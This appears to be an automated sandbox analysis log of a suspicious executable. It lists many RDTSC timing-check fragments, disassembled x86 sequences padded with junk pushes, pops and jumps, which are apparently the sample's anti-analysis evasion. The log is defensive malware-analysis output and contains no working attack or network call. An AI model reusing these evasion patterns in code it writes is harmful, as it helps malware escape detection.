Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEC25F second address: EEC26F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 jo 00007F8854FD8856h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEC26F second address: EEC27B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEC27B second address: EEC2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD8867h 0x00000009 jmp 00007F8854FD8864h 0x0000000e popad 0x0000000f jmp 00007F8854FD885Eh 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEFF25 second address: EEFF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8854FAEB86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEFF31 second address: EEFF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 jl 00007F8854FD887Ch 0x0000000c jmp 00007F8854FD8862h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEFF53 second address: EEFF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF555 second address: EEF55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF55A second address: EEF55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF694 second address: EEF6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jp 00007F8854FD8856h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF833 second address: EEF83F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF83F second address: EEF843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF843 second address: EEF85B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB92h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7661 second address: EF7669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7669 second address: EF7679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF79F6 second address: EF79FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF79FC second address: EF7A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8854FAEB94h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7A1E second address: EF7A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7A24 second address: EF7A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF907F second address: EF9083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF9083 second address: EF908D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF908D second address: EF909E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8854FD885Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF909E second address: EF90E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F8854FAEB86h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F8854FAEB8Eh 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a jo 00007F8854FAEB86h 0x00000020 jo 00007F8854FAEB86h 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8854FAEB92h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF90E4 second address: EF90ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF90ED second address: EF90F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6DFB second address: EF6DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6DFF second address: EF6E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E35EE2 second address: E35EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8854FD885Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E35EF6 second address: E35EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F01672 second address: F0168B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0168B second address: F0168F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F12749 second address: F1274E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F17182 second address: F1719F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8854FAEB86h 0x0000000a jmp 00007F8854FAEB93h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1F4B7 second address: F1F4C3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8854FD885Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F20DA7 second address: F20DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F20DAD second address: F20DB9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8854FD8856h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F20DB9 second address: F20DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8854FAEB86h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F279AC second address: F279B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F279B0 second address: F279BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F27E19 second address: F27E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F28200 second address: F2820D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8854FAEB86h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2820D second address: F2821B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F8854FD8856h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2821B second address: F28221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F28DDA second address: F28DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F28DDE second address: F28DE4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F28DE4 second address: F28DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F8854FD8858h 0x0000000c push edx 0x0000000d pop edx 0x0000000e jne 00007F8854FD885Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2DF0B second address: F2DF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38AC9 second address: F38ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38ACF second address: F38ADF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8854FAEB86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38ADF second address: F38AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38AE5 second address: F38AFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Ch 0x00000007 jl 00007F8854FAEB86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38990 second address: F38996 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38996 second address: F3899B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4CA43 second address: F4CA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4CA4C second address: F4CA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8854FAEB8Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C762 second address: F4C77B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007F8854FD8856h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F661EE second address: F661F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F650CF second address: F650D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F650D5 second address: F650DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F650DB second address: F650DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F650DF second address: F65101 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F8854FAEB93h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jnp 00007F8854FAEB86h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F654C4 second address: F654D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD885Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F65642 second address: F65650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8854FAEB86h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F65650 second address: F6565B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8854FD8856h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6565B second address: F65668 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F8854FAEB86h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F65907 second address: F65928 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8868h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F65928 second address: F65950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8854FAEB8Ah 0x0000000e jmp 00007F8854FAEB95h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F65950 second address: F6595F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8854FD8856h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6A259 second address: F6A267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB8Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6A745 second address: F6A79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD885Ah 0x00000009 popad 0x0000000a nop 0x0000000b or edx, 29B455ADh 0x00000011 push dword ptr [ebp+12456472h] 0x00000017 push edi 0x00000018 push ebx 0x00000019 mov edx, dword ptr [ebp+122D5AC0h] 0x0000001f pop edx 0x00000020 pop edx 0x00000021 call 00007F8854FD8859h 0x00000026 jmp 00007F8854FD885Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F8854FD885Eh 0x00000032 pop edx 0x00000033 mov eax, dword ptr [esp+04h] 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a js 00007F8854FD8856h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C001 second address: F6C008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C008 second address: F6C015 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F8854FD8856h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10BD1 second address: 4E10BFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F8854FAEBE1h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edx, 1E5E7ACEh 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10BFB second address: 4E10C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD8861h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C10 second address: 4E10C2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add eax, ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C2F second address: 4E10C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C35 second address: 4E10C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax+00000860h] 0x0000000f pushad 0x00000010 mov si, 0FFDh 0x00000014 mov ax, AEF9h 0x00000018 popad 0x00000019 test eax, eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C63 second address: 4E10C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C67 second address: 4E10C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C6D second address: 4E10C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C73 second address: 4E10C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88037 second address: E88040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88040 second address: E8804D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E883E5 second address: E883EF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8854FD8856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E883EF second address: E883F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8854FAEB86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E883F9 second address: E883FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E303C7 second address: 4E303F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F8854FAEB96h 0x00000010 mov edx, dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ax, di 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E303F8 second address: 4E30423 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8865h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d call 00007F8854FD885Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E3045B second address: 4E30461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E30461 second address: 4E30465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20628 second address: 4E2062C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2062C second address: 4E20649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8869h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20649 second address: 4E2064F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2064F second address: 4E20653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20653 second address: 4E20657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20657 second address: 4E20689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8854FD8860h 0x00000013 adc ch, 00000068h 0x00000016 jmp 00007F8854FD885Bh 0x0000001b popfd 0x0000001c mov ax, F15Fh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20689 second address: 4E2069D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB90h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2069D second address: 4E206ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d movzx eax, bx 0x00000010 push ebx 0x00000011 pushfd 0x00000012 jmp 00007F8854FD885Ch 0x00000017 adc ecx, 123D1428h 0x0000001d jmp 00007F8854FD885Bh 0x00000022 popfd 0x00000023 pop eax 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F8854FD8865h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E206ED second address: 4E206FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E206FD second address: 4E20701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20701 second address: 4E20716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 7473B5EFh 0x00000011 movzx eax, di 0x00000014 popad 0x00000015 rdtsc
